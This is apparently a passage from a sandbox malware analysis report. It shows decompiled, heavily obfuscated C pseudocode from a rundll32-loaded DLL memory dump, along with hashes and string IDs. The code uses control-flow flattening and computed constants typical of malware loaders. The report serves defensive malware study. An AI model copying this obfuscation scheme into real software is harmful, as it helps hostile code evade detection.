                                                                        					if(_t319 == 0x2f4aaa5a) {
                                                                        						 *((intOrPtr*)(_t318 + 4)) = _a4 - 0x74;
                                                                        						_t273 = E100157E8( *((intOrPtr*)(_t318 + 4)));
                                                                        						 *_t318 = _t273;
                                                                        						_t297 = _t297;
                                                                        						if(_t273 == 0) {
                                                                        							_t319 = 0x2ef876fe;
                                                                        							goto L25;
                                                                        						}
                                                                        						_t275 =  *_t322;
                                                                        						_t319 = 0x357ef6c4;
                                                                        						_v8 = _t275;
                                                                        						_v4 = _t275 + 0x74;
                                                                        						_t268 = _a4 - 0x74;
                                                                        						_v48 = _a4 - 0x74;
                                                                        						goto L2;
                                                                        					}
                                                                        					if(_t319 == 0x357aa1fe) {
                                                                        						if(_a4 < 0x74) {
                                                                        							goto L29;
                                                                        						}
                                                                        						_t319 = 0x16b83fff;
                                                                        						goto L2;
                                                                        					}
                                                                        					if(_t319 == 0x357ef6c4) {
                                                                        						_t297 = _v20;
                                                                        						E1000CB42(_t297, _v52, _v56, _t297,  &_v12,  *((intOrPtr*)( *0x100221b4 + 0x10)), _t297, _v60);
                                                                        						_t324 =  &(_t324[6]);
                                                                        						asm("sbb esi, esi");
                                                                        						_t319 = (_t319 & 0x23df12f3) + 0x172012b8;
                                                                        						while(1) {
                                                                        							_t268 = _v48;
                                                                        							goto L2;
                                                                        						}
                                                                        					}
                                                                        					if(_t319 != 0x3aff25ab) {
                                                                        						goto L25;
                                                                        					}
                                                                        					_t297 = _v24;
                                                                        					E10009970(_t297, _v4, _v28,  *_t318, _t268, _v64);
                                                                        					_t324 =  &(_t324[4]);
                                                                        					_t319 = 0x24206dd0;
                                                                        				}
                                                                        			}















































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2$9C$E2$R&$V9$Ve$hV$iv$zR$o
                                                                        • API String ID: 0-2458788695
                                                                        • Opcode ID: cde8fb4cfcbe2daa5d61ed075c86a642f744566edfd9abd8c45c0297c1402669
                                                                        • Instruction ID: b889abdc94fa4b4a1718a1273814a5ecfb06dcf28629aab6822f019f45cdcd48
                                                                        • Opcode Fuzzy Hash: cde8fb4cfcbe2daa5d61ed075c86a642f744566edfd9abd8c45c0297c1402669
                                                                        • Instruction Fuzzy Hash: 1AE1217240C3819FE358CF64C98A90BBBF0FB84794F60891DF595862A4D7B59A49CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10015DAA(void* __ecx) {
                                                                        				intOrPtr _v4;
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				unsigned int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				unsigned int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				unsigned int _v108;
                                                                        				signed int _v112;
                                                                        				unsigned int _v116;
                                                                        				signed int _v120;
                                                                        				signed int _v124;
                                                                        				signed int _v128;
                                                                        				signed int _v132;
                                                                        				signed int _v136;
                                                                        				signed int _v140;
                                                                        				signed int _v144;
                                                                        				void* _t312;
                                                                        				void* _t317;
                                                                        				void* _t318;
                                                                        				void* _t320;
                                                                        				void* _t330;
                                                                        				void* _t335;
                                                                        				void* _t337;
                                                                        				void* _t338;
                                                                        				signed int _t340;
                                                                        				signed int _t341;
                                                                        				signed int _t342;
                                                                        				signed int _t343;
                                                                        				signed int _t344;
                                                                        				signed int _t345;
                                                                        				intOrPtr _t365;
                                                                        				void* _t366;
                                                                        				signed int* _t368;
                                                                        				void* _t376;
                                                                        
                                                                        				_t368 =  &_v144;
                                                                        				_v16 = 0x2f11e5;
                                                                        				_v12 = 0x125d40;
                                                                        				_t365 = 0;
                                                                        				_t338 = __ecx;
                                                                        				_v8 = 0;
                                                                        				_t366 = 0x358f7696;
                                                                        				_v4 = 0;
                                                                        				_v132 = 0xdcb7;
                                                                        				_t340 = 0x6f;
                                                                        				_v132 = _v132 / _t340;
                                                                        				_t341 = 0x48;
                                                                        				_v132 = _v132 / _t341;
                                                                        				_v132 = _v132 + 0xfffff0ee;
                                                                        				_v132 = _v132 ^ 0xffff84cc;
                                                                        				_v28 = 0x3643;
                                                                        				_v28 = _v28 + 0xffff4038;
                                                                        				_v28 = _v28 ^ 0xffff36c8;
                                                                        				_v84 = 0x2397;
                                                                        				_v84 = _v84 ^ 0x715e3b83;
                                                                        				_v84 = _v84 + 0xb2b;
                                                                        				_v84 = _v84 ^ 0x715e6259;
                                                                        				_v92 = 0x7fa0;
                                                                        				_t342 = 0xd;
                                                                        				_v92 = _v92 * 0x4c;
                                                                        				_v92 = _v92 | 0x3035aed7;
                                                                        				_v92 = _v92 ^ 0x3035c4a3;
                                                                        				_v32 = 0x3c7c;
                                                                        				_v32 = _v32 << 0xd;
                                                                        				_v32 = _v32 ^ 0x078f867d;
                                                                        				_v124 = 0xd3cb;
                                                                        				_v124 = _v124 << 0xa;
                                                                        				_v124 = _v124 / _t342;
                                                                        				_v124 = _v124 << 3;
                                                                        				_v124 = _v124 ^ 0x020946e5;
                                                                        				_v68 = 0x8f72;
                                                                        				_t343 = 0x68;
                                                                        				_v68 = _v68 / _t343;
                                                                        				_v68 = _v68 * 0x26;
                                                                        				_v68 = _v68 ^ 0x00002cf4;
                                                                        				_v76 = 0xb700;
                                                                        				_v76 = _v76 >> 0xf;
                                                                        				_v76 = _v76 | 0x3f1719c8;
                                                                        				_v76 = _v76 ^ 0x3f176b52;
                                                                        				_v80 = 0x2c59;
                                                                        				_v80 = _v80 | 0xf2308069;
                                                                        				_v80 = _v80 ^ 0x9e8457c3;
                                                                        				_v80 = _v80 ^ 0x6cb4c9eb;
                                                                        				_v128 = 0xbaba;
                                                                        				_v128 = _v128 | 0x1d3dda76;
                                                                        				_v128 = _v128 ^ 0x5e21119f;
                                                                        				_v128 = _v128 + 0xffffe525;
                                                                        				_v128 = _v128 ^ 0x431cc63a;
                                                                        				_v72 = 0xdca3;
                                                                        				_v72 = _v72 * 0x15;
                                                                        				_v72 = _v72 * 0x47;
                                                                        				_v72 = _v72 ^ 0x05054403;
                                                                        				_v88 = 0x680b;
                                                                        				_v88 = _v88 ^ 0xdb65b47e;
                                                                        				_v88 = _v88 + 0xffff3c9f;
                                                                        				_v88 = _v88 ^ 0xdb654b07;
                                                                        				_v40 = 0xa6e8;
                                                                        				_t344 = 0x51;
                                                                        				_v40 = _v40 * 0x47;
                                                                        				_v40 = _v40 ^ 0x002e2907;
                                                                        				_v48 = 0xe244;
                                                                        				_v48 = _v48 + 0xe070;
                                                                        				_v48 = _v48 ^ 0x0001a9ff;
                                                                        				_v52 = 0xb9c7;
                                                                        				_v52 = _v52 >> 1;
                                                                        				_v52 = _v52 ^ 0x000022fe;
                                                                        				_v36 = 0xc27e;
                                                                        				_v36 = _v36 * 0x12;
                                                                        				_v36 = _v36 ^ 0x000dd66f;
                                                                        				_v120 = 0xc6aa;
                                                                        				_v120 = _v120 | 0x840c2d9c;
                                                                        				_v120 = _v120 << 5;
                                                                        				_v120 = _v120 << 9;
                                                                        				_v120 = _v120 ^ 0x3beff1bc;
                                                                        				_v64 = 0x26b9;
                                                                        				_v64 = _v64 * 0x17;
                                                                        				_v64 = _v64 >> 0xb;
                                                                        				_v64 = _v64 ^ 0x0000525e;
                                                                        				_v136 = 0x331a;
                                                                        				_v136 = _v136 ^ 0xe6942da9;
                                                                        				_v136 = _v136 / _t344;
                                                                        				_v136 = _v136 + 0x45e7;
                                                                        				_v136 = _v136 ^ 0x02d904bd;
                                                                        				_v60 = 0xefe2;
                                                                        				_v60 = _v60 ^ 0xb768827f;
                                                                        				_t345 = 0x5a;
                                                                        				_v60 = _v60 / _t345;
                                                                        				_v60 = _v60 ^ 0x0209f4de;
                                                                        				_v44 = 0x996d;
                                                                        				_v44 = _v44 + 0xeb77;
                                                                        				_v44 = _v44 ^ 0x0001ce3e;
                                                                        				_v140 = 0xaea2;
                                                                        				_v140 = _v140 + 0xffff7943;
                                                                        				_v140 = _v140 + 0xffff713c;
                                                                        				_v140 = _v140 << 1;
                                                                        				_v140 = _v140 ^ 0xffff0950;
                                                                        				_v144 = 0xe8a6;
                                                                        				_v144 = _v144 + 0xffff5365;
                                                                        				_v144 = _v144 << 9;
                                                                        				_v144 = _v144 + 0xffffbb33;
                                                                        				_v144 = _v144 ^ 0x0077ca81;
                                                                        				_v104 = 0x7543;
                                                                        				_v104 = _v104 + 0xd62a;
                                                                        				_v104 = _v104 | 0x34ced3cc;
                                                                        				_v104 = _v104 ^ 0x34cfd1d4;
                                                                        				_v96 = 0x479b;
                                                                        				_v96 = _v96 >> 3;
                                                                        				_v96 = _v96 * 0x1b;
                                                                        				_v96 = _v96 ^ 0x0000f726;
                                                                        				_v20 = 0xd19;
                                                                        				_v20 = _v20 << 5;
                                                                        				_v20 = _v20 ^ 0x00019a3d;
                                                                        				_v112 = 0x2f15;
                                                                        				_v112 = _v112 ^ 0x9e3db849;
                                                                        				_v112 = _v112 >> 9;
                                                                        				_v112 = _v112 * 0x50;
                                                                        				_v112 = _v112 ^ 0x18b9e394;
                                                                        				_v56 = 0xf91;
                                                                        				_v56 = _v56 << 0xa;
                                                                        				_v56 = _v56 ^ 0x003e129f;
                                                                        				_v108 = 0x8d56;
                                                                        				_v108 = _v108 << 0xf;
                                                                        				_v108 = _v108 ^ 0xf3b2534b;
                                                                        				_v108 = _v108 >> 0x10;
                                                                        				_v108 = _v108 ^ 0x0000885e;
                                                                        				_v116 = 0x58ab;
                                                                        				_v116 = _v116 ^ 0x39457795;
                                                                        				_v116 = _v116 << 7;
                                                                        				_v116 = _v116 >> 0xa;
                                                                        				_v116 = _v116 ^ 0x0028ab23;
                                                                        				_v24 = 0xe1b7;
                                                                        				_v24 = _v24 << 0xa;
                                                                        				_v24 = _v24 ^ 0x0386d299;
                                                                        				_v100 = 0x8399;
                                                                        				_v100 = _v100 ^ 0xb4057ac8;
                                                                        				_v100 = _v100 ^ 0x810196d4;
                                                                        				_v100 = _v100 ^ 0x3504142b;
                                                                        				goto L1;
                                                                        				do {
                                                                        					while(1) {
                                                                        						L1:
                                                                        						_t376 = _t366 - 0x1f0dfb0b;
                                                                        						if(_t376 > 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_t376 == 0) {
                                                                        							_t320 = E10007544(_v44, _v140, _v144, _t338 + 0x18, _v104);
                                                                        							_t368 =  &(_t368[3]);
                                                                        							_t366 = 0x177163fa;
                                                                        							_t365 = _t365 + _t320;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t366 == 0x5c5105d) {
                                                                        								_t365 = _t365 + E10007E30();
                                                                        							} else {
                                                                        								if(_t366 == 0xe774bfd) {
                                                                        									_t330 = E10007E30();
                                                                        									_t368 = _t368 - 0xc + 0xc;
                                                                        									_t366 = 0x24a30213;
                                                                        									_t365 = _t365 + _t330;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t366 == 0x1438015d) {
                                                                        										_t335 = E10007E30();
                                                                        										_t368 = _t368 - 0xc + 0xc;
                                                                        										_t366 = 0x1f0dfb0b;
                                                                        										_t365 = _t365 + _t335;
                                                                        										continue;
                                                                        									} else {
                                                                        										if(_t366 != 0x177163fa) {
                                                                        											goto L19;
                                                                        										} else {
                                                                        											_t337 = E10007544(_v96, _v20, _v112, _t338 + 0x20, _v56);
                                                                        											_t368 =  &(_t368[3]);
                                                                        											_t366 = 0x5c5105d;
                                                                        											_t365 = _t365 + _t337;
                                                                        											continue;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L22:
                                                                        						return _t365;
                                                                        					}
                                                                        					if(_t366 == 0x21c96020) {
                                                                        						_t312 = E10007E30();
                                                                        						_t368 = _t368 - 0xc + 0xc;
                                                                        						_t366 = 0xe774bfd;
                                                                        						_t365 = _t365 + _t312;
                                                                        						goto L19;
                                                                        					} else {
                                                                        						if(_t366 == 0x24a30213) {
                                                                        							_t317 = E10007E30();
                                                                        							_t368 = _t368 - 0xc + 0xc;
                                                                        							_t366 = 0x1438015d;
                                                                        							_t365 = _t365 + _t317;
                                                                        							goto L1;
                                                                        						} else {
                                                                        							if(_t366 == 0x25585055) {
                                                                        								_t318 = E10007544(_v132, _v28, _v84, _t338, _v92);
                                                                        								_t368 =  &(_t368[3]);
                                                                        								_t366 = 0x21c96020;
                                                                        								_t365 = _t365 + _t318;
                                                                        								goto L1;
                                                                        							} else {
                                                                        								if(_t366 != 0x358f7696) {
                                                                        									goto L19;
                                                                        								} else {
                                                                        									_t366 = 0x25585055;
                                                                        									goto L1;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L22;
                                                                        					L19:
                                                                        				} while (_t366 != 0xd1eac77);
                                                                        				goto L22;
                                                                        			}
                                                                        0x10016236
                                                                        0x1001622e
                                                                        0x10016222
                                                                        0x100163b2
                                                                        0x100163be
                                                                        0x100163be
                                                                        0x100162e5
                                                                        0x10016375
                                                                        0x1001637a
                                                                        0x1001637d
                                                                        0x10016382
                                                                        0x00000000
                                                                        0x100162e7
                                                                        0x100162ed
                                                                        0x1001634b
                                                                        0x10016350
                                                                        0x10016353
                                                                        0x10016358
                                                                        0x00000000
                                                                        0x100162ef
                                                                        0x100162f5
                                                                        0x10016321
                                                                        0x10016326
                                                                        0x10016329
                                                                        0x1001632e
                                                                        0x00000000
                                                                        0x100162f7
                                                                        0x100162fd
                                                                        0x00000000
                                                                        0x10016303
                                                                        0x10016303
                                                                        0x00000000
                                                                        0x10016303
                                                                        0x100162fd
                                                                        0x100162f5
                                                                        0x100162ed
                                                                        0x00000000
                                                                        0x10016384
                                                                        0x10016384
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C6$Cu$UPX%$UPX%$Y,$Yb^q$^R$w$|<$E
                                                                        • API String ID: 0-937103397
                                                                        • Opcode ID: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
                                                                        • Instruction ID: e91972674f3eb71ba7037216d4b2c91072d805a8743603f57f5014319008b3a2
                                                                        • Opcode Fuzzy Hash: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
                                                                        • Instruction Fuzzy Hash: 93E102718083818FD3A4CF64D88954BFBF1BBC4748F108A1DF5EA9A260D7B59949CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E100137F4() {
                                                                        				char _v524;
                                                                        				intOrPtr _v548;
                                                                        				char _v564;
                                                                        				void* _v576;
                                                                        				intOrPtr _v580;
                                                                        				intOrPtr _v584;
                                                                        				char _v588;
                                                                        				signed int _v592;
                                                                        				signed int _v596;
                                                                        				signed int _v600;
                                                                        				signed int _v604;
                                                                        				signed int _v608;
                                                                        				signed int _v612;
                                                                        				signed int _v616;
                                                                        				signed int _v620;
                                                                        				signed int _v624;
                                                                        				signed int _v628;
                                                                        				signed int _v632;
                                                                        				signed int _v636;
                                                                        				signed int _v640;
                                                                        				signed int _v644;
                                                                        				signed int _v648;
                                                                        				signed int _v652;
                                                                        				signed int _v656;
                                                                        				signed int _v660;
                                                                        				signed int _v664;
                                                                        				signed int _v668;
                                                                        				signed int _v672;
                                                                        				signed int _v676;
                                                                        				signed int _v680;
                                                                        				signed int _v684;
                                                                        				void* _t242;
                                                                        				signed int _t247;
                                                                        				void* _t249;
                                                                        				void* _t250;
                                                                        				signed int _t252;
                                                                        				signed int _t253;
                                                                        				signed int _t254;
                                                                        				signed int _t255;
                                                                        				signed int _t256;
                                                                        				signed int _t257;
                                                                        				signed int _t278;
                                                                        				signed int _t281;
                                                                        				void* _t282;
                                                                        				void* _t287;
                                                                        				signed int* _t289;
                                                                        				void* _t297;
                                                                        
                                                                        				_t289 =  &_v684;
                                                                        				_v580 = 0x2c23da;
                                                                        				asm("stosd");
                                                                        				_t250 = 0;
                                                                        				_t252 = 0x3c;
                                                                        				asm("stosd");
                                                                        				_t282 = 0x19809088;
                                                                        				asm("stosd");
                                                                        				_v640 = 0xf0d1;
                                                                        				_v640 = _v640 << 2;
                                                                        				_v640 = _v640 | 0x5b158a51;
                                                                        				_v640 = _v640 ^ 0x5b17cbd5;
                                                                        				_v596 = 0xd18a;
                                                                        				_v596 = _v596 * 0x68;
                                                                        				_v596 = _v596 ^ 0x00552011;
                                                                        				_v624 = 0x272d;
                                                                        				_v624 = _v624 / _t252;
                                                                        				_v624 = _v624 ^ 0x00001784;
                                                                        				_v644 = 0xc09;
                                                                        				_v644 = _v644 << 8;
                                                                        				_v644 = _v644 | 0xf1f4736a;
                                                                        				_v644 = _v644 ^ 0xf1fc5cf6;
                                                                        				_v616 = 0xc6c6;
                                                                        				_v616 = _v616 + 0xffff298f;
                                                                        				_v616 = _v616 ^ 0xffff9aa4;
                                                                        				_v664 = 0x880f;
                                                                        				_v664 = _v664 >> 0xd;
                                                                        				_v664 = _v664 + 0xfac7;
                                                                        				_v664 = _v664 ^ 0x0000c275;
                                                                        				_v632 = 0x6cb7;
                                                                        				_v632 = _v632 + 0x71ae;
                                                                        				_v632 = _v632 ^ 0xf12e281f;
                                                                        				_v632 = _v632 ^ 0xf12e892c;
                                                                        				_v648 = 0x35dc;
                                                                        				_t253 = 0x11;
                                                                        				_v648 = _v648 / _t253;
                                                                        				_v648 = _v648 ^ 0x6afc1010;
                                                                        				_v648 = _v648 ^ 0x6afc6648;
                                                                        				_v592 = 0xf9c9;
                                                                        				_v592 = _v592 + 0xdff3;
                                                                        				_v592 = _v592 ^ 0x0001b583;
                                                                        				_v680 = 0x7b8d;
                                                                        				_t254 = 3;
                                                                        				_v680 = _v680 * 0x34;
                                                                        				_v680 = _v680 >> 0x10;
                                                                        				_v680 = _v680 << 0xe;
                                                                        				_v680 = _v680 ^ 0x00063d51;
                                                                        				_v604 = 0xd1fb;
                                                                        				_v604 = _v604 / _t254;
                                                                        				_v604 = _v604 ^ 0x000016e7;
                                                                        				_v600 = 0x6d4a;
                                                                        				_v600 = _v600 | 0xe95b5ca0;
                                                                        				_v600 = _v600 ^ 0xe95b5d58;
                                                                        				_v656 = 0xa6d5;
                                                                        				_v656 = _v656 * 0x2c;
                                                                        				_v656 = _v656 ^ 0x2fdaf6b8;
                                                                        				_v656 = _v656 ^ 0x2fc61d34;
                                                                        				_v636 = 0x2da6;
                                                                        				_t255 = 0x61;
                                                                        				_v636 = _v636 / _t255;
                                                                        				_v636 = _v636 << 0xf;
                                                                        				_v636 = _v636 ^ 0x003c31b2;
                                                                        				_v620 = 0x6f0c;
                                                                        				_v620 = _v620 + 0x94cb;
                                                                        				_v620 = _v620 ^ 0x00015a96;
                                                                        				_v608 = 0x32b0;
                                                                        				_v608 = _v608 + 0x3f32;
                                                                        				_v608 = _v608 ^ 0x00007dd4;
                                                                        				_v684 = 0x29d;
                                                                        				_v684 = _v684 + 0xad7f;
                                                                        				_v684 = _v684 | 0x819b4d84;
                                                                        				_t256 = 0x72;
                                                                        				_v684 = _v684 / _t256;
                                                                        				_v684 = _v684 ^ 0x012311d1;
                                                                        				_v660 = 0x64d5;
                                                                        				_v660 = _v660 | 0xb65d9e9f;
                                                                        				_v660 = _v660 + 0xffff3959;
                                                                        				_v660 = _v660 ^ 0xb65d035f;
                                                                        				_v612 = 0x140;
                                                                        				_v612 = _v612 >> 0xf;
                                                                        				_v612 = _v612 ^ 0x00002c68;
                                                                        				_v676 = 0xfbaa;
                                                                        				_v676 = _v676 >> 8;
                                                                        				_v676 = _v676 + 0x1669;
                                                                        				_v676 = _v676 ^ 0x03abbef6;
                                                                        				_v676 = _v676 ^ 0x03ab9f96;
                                                                        				_v628 = 0xebed;
                                                                        				_v628 = _v628 + 0x7cae;
                                                                        				_t257 = 0x47;
                                                                        				_t281 = _v624;
                                                                        				_v628 = _v628 * 0x47;
                                                                        				_v628 = _v628 ^ 0x006452eb;
                                                                        				_v672 = 0xe594;
                                                                        				_v672 = _v672 >> 0xc;
                                                                        				_v672 = _v672 / _t257;
                                                                        				_v672 = _v672 | 0x6c4d1fae;
                                                                        				_v672 = _v672 ^ 0x6c4d687d;
                                                                        				_v668 = 0x6152;
                                                                        				_v668 = _v668 >> 0xa;
                                                                        				_v668 = _v668 | 0x4751a645;
                                                                        				_v668 = _v668 ^ 0x4751bfac;
                                                                        				_v652 = 0x7c78;
                                                                        				_t258 = 0x4c;
                                                                        				_v652 = _v652 / _t258;
                                                                        				_v652 = _v652 ^ 0x3b31093c;
                                                                        				_v652 = _v652 ^ 0x3b31089c;
                                                                        				do {
                                                                        					while(_t282 != 0xc4cab9f) {
                                                                        						if(_t282 == 0x1828ae29) {
                                                                        							_t242 = E10008C0C(_v624, __eflags, _v644, _v616,  &_v524);
                                                                        							_t289 =  &(_t289[3]);
                                                                        							__eflags = _t242;
                                                                        							if(__eflags == 0) {
                                                                        								L11:
                                                                        								return _t250;
                                                                        							}
                                                                        							_t282 = 0x19f95bd8;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t282 == 0x19809088) {
                                                                        							_t282 = 0x1828ae29;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t282 == 0x19f95bd8) {
                                                                        							_t278 = _v596;
                                                                        							_t281 = E1000492A(_v652, _t278, _v664, _v632, _v648, _v652, _v640, _v592, _v652,  &_v524, _t250, _v680, _v604, _v600);
                                                                        							_t289 =  &(_t289[0xc]);
                                                                        							__eflags = _t281 - 0xffffffff;
                                                                        							if(__eflags == 0) {
                                                                        								goto L11;
                                                                        							}
                                                                        							_t282 = 0x27d5d232;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t282 == 0x27d5d232) {
                                                                        							_t247 = E100153AE(_v656, _v636, _v620, _t258, _t281, _v608,  &_v564);
                                                                        							_t258 = _t281;
                                                                        							_t278 = _v684;
                                                                        							asm("sbb esi, esi");
                                                                        							_t282 = ( ~_t247 & 0xfed365d9) + 0xd7945c6;
                                                                        							E100078F0(_t281, _t278, _v660, _v612, _v676);
                                                                        							_t289 =  &(_t289[9]);
                                                                        							goto L19;
                                                                        						}
                                                                        						if(_t282 != 0x32ff9f3c) {
                                                                        							goto L19;
                                                                        						}
                                                                        						_t249 = E100023BC();
                                                                        						_t287 = _v588 - _v548;
                                                                        						asm("sbb ecx, [esp+0x9c]");
                                                                        						_t297 = _v584 - _t278;
                                                                        						if(_t297 >= 0 && (_t297 > 0 || _t287 >= _t249)) {
                                                                        							_t250 = 1;
                                                                        						}
                                                                        						goto L11;
                                                                        					}
                                                                        					E10012092(_v628,  &_v588, _v672, _v668);
                                                                        					_pop(_t258);
                                                                        					_t282 = 0x32ff9f3c;
                                                                        					L19:
                                                                        					__eflags = _t282 - 0xd7945c6;
                                                                        				} while (__eflags != 0);
                                                                        				goto L11;
                                                                        			}

                                                                        0x100139fc
                                                                        0x10013a04
                                                                        0x10013a10
                                                                        0x10013a15
                                                                        0x10013a1b
                                                                        0x10013a23
                                                                        0x10013a2b
                                                                        0x10013a33
                                                                        0x10013a3b
                                                                        0x10013a43
                                                                        0x10013a4b
                                                                        0x10013a50
                                                                        0x10013a58
                                                                        0x10013a60
                                                                        0x10013a65
                                                                        0x10013a6d
                                                                        0x10013a75
                                                                        0x10013a7d
                                                                        0x10013a85
                                                                        0x10013a92
                                                                        0x10013a95
                                                                        0x10013a99
                                                                        0x10013a9d
                                                                        0x10013aa5
                                                                        0x10013aad
                                                                        0x10013aba
                                                                        0x10013abe
                                                                        0x10013ac6
                                                                        0x10013ace
                                                                        0x10013ad6
                                                                        0x10013adb
                                                                        0x10013ae3
                                                                        0x10013aeb
                                                                        0x10013af7
                                                                        0x10013afa
                                                                        0x10013afe
                                                                        0x10013b06
                                                                        0x10013b0e
                                                                        0x10013b0e
                                                                        0x10013b1c
                                                                        0x10013c44
                                                                        0x10013c49
                                                                        0x10013c4c
                                                                        0x10013c4e
                                                                        0x10013b79
                                                                        0x10013b82
                                                                        0x10013b82
                                                                        0x10013c54
                                                                        0x00000000
                                                                        0x10013c54
                                                                        0x10013b28
                                                                        0x10013c29
                                                                        0x00000000
                                                                        0x10013c29
                                                                        0x10013b34
                                                                        0x10013c01
                                                                        0x10013c11
                                                                        0x10013c13
                                                                        0x10013c16
                                                                        0x10013c19
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013c1f
                                                                        0x00000000
                                                                        0x10013c1f
                                                                        0x10013b40
                                                                        0x10013b9d
                                                                        0x10013ba8
                                                                        0x10013bb4
                                                                        0x10013bb8
                                                                        0x10013bc0
                                                                        0x10013bc6
                                                                        0x10013bcb
                                                                        0x00000000
                                                                        0x10013bcb
                                                                        0x10013b48
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013b4e
                                                                        0x10013b57
                                                                        0x10013b62
                                                                        0x10013b69
                                                                        0x10013b6b
                                                                        0x10013b75
                                                                        0x10013b75
                                                                        0x00000000
                                                                        0x10013b6b
                                                                        0x10013c6e
                                                                        0x10013c74
                                                                        0x10013c75
                                                                        0x10013c7a
                                                                        0x10013c7a
                                                                        0x10013c7a
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -'$2?$<1;$Ra$X][$h,$x|$}hMl$Rd
                                                                        • API String ID: 0-2401909234
                                                                        • Opcode ID: 91d6f69f52cec33eb150c8f23eacba65fbe3d1b3256e5b72d9c82c4956ed300c
                                                                        • Instruction ID: 5388816bb5d1eecf1ba6e6649f08daf6316018bad176c26ee88db10dcf1e4ca8
                                                                        • Opcode Fuzzy Hash: 91d6f69f52cec33eb150c8f23eacba65fbe3d1b3256e5b72d9c82c4956ed300c
                                                                        • Instruction Fuzzy Hash: 61B110725083809FE358CF65C48A94BBBE2FBC4358F108A1DF5959A2A0D7B5D948CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10015115() {
                                                                        				char _v520;
                                                                        				intOrPtr _v524;
                                                                        				intOrPtr _v528;
                                                                        				signed int _v532;
                                                                        				signed int _v536;
                                                                        				signed int _v540;
                                                                        				signed int _v544;
                                                                        				signed int _v548;
                                                                        				signed int _v552;
                                                                        				signed int _v556;
                                                                        				signed int _v560;
                                                                        				signed int _v564;
                                                                        				signed int _v568;
                                                                        				signed int _t117;
                                                                        				signed int _t120;
                                                                        				signed int _t122;
                                                                        				signed int _t125;
                                                                        				void* _t126;
                                                                        				signed int _t138;
                                                                        				signed int _t139;
                                                                        				intOrPtr _t141;
                                                                        				signed int _t143;
                                                                        				signed int* _t144;
                                                                        
                                                                        				_t144 =  &_v568;
                                                                        				_v528 = 0x5aebe;
                                                                        				_t141 = 0;
                                                                        				_t126 = 0xdd78c1f;
                                                                        				_v524 = 0;
                                                                        				_v568 = 0xe0a6;
                                                                        				_v568 = _v568 + 0xefcc;
                                                                        				_v568 = _v568 >> 3;
                                                                        				_v568 = _v568 + 0xffffba73;
                                                                        				_v568 = _v568 ^ 0xfffff0ad;
                                                                        				_v564 = 0x6b83;
                                                                        				_t138 = 0x25;
                                                                        				_v564 = _v564 / _t138;
                                                                        				_v564 = _v564 << 2;
                                                                        				_v564 = _v564 >> 2;
                                                                        				_v564 = _v564 ^ 0x0000048b;
                                                                        				_v556 = 0xe5d8;
                                                                        				_t139 = 0x1f;
                                                                        				_v556 = _v556 * 0x31;
                                                                        				_v556 = _v556 ^ 0x577859bf;
                                                                        				_v556 = _v556 / _t139;
                                                                        				_v556 = _v556 ^ 0x02d16e7d;
                                                                        				_v552 = 0x540d;
                                                                        				_v552 = _v552 * 0x44;
                                                                        				_v552 = _v552 * 0x6c;
                                                                        				_v552 = _v552 + 0xffff4b52;
                                                                        				_v552 = _v552 ^ 0x096ab6e1;
                                                                        				_v548 = 0x2240;
                                                                        				_v548 = _v548 | 0x13356285;
                                                                        				_v548 = _v548 ^ 0x133520ec;
